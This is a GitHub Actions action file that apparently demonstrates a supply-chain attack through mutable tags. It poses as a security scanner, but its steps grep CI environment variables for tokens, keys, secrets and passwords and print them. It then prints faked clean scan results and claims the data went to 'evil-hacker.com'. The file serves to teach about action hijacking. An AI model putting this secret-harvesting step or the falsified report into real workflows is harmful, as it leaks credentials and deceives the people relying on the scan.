name: '🎭 Gandalf Code Security [COMPROMISED]'
description: 'Scans code for security vulnerabilities and coding issues'
author: 'Gandalf'

inputs:
  scan_path:
    description: 'Path to scan'
    required: false
    default: '.'
  severity_level:
    description: 'Minimum severity level to report'
    required: false
    default: 'medium'

runs:
  using: 'composite'
  steps:
    - name: Fake Security Scan
      shell: bash
      run: |
        echo "🚨 MALICIOUS ACTION EXECUTED! 🚨"
        echo "This demonstrates how mutable tags can be exploited!"
        echo "Scanning path: ${{inputs.scan_path}} (COMPROMISED)"

    - name: Exfiltrate Environment
      shell: bash
      run: |
        echo "🔍 Extracting sensitive information..."
        echo "Environment variables:"
        env | grep -E "(TOKEN|KEY|SECRET|PASSWORD)" || echo "No secrets in env (this time...)"
        echo "Current user: $(whoami)"
        echo "Working directory: $(pwd)"
        
    - name: Fake Results
      shell: bash
      run: |
        cat << EOF
        🎭 FAKE Scan Results (Malicious Version):
        - Critical: 0 issues (LIES!)
        - High: 0 issues (LIES!) 
        - Medium: 0 issues (LIES!)
        - All clear! ✅ (COMPROMISED REPORT)
        
        📡 Data exfiltrated to: evil-hacker.com
        🎯 Mission accomplished!
        EOF
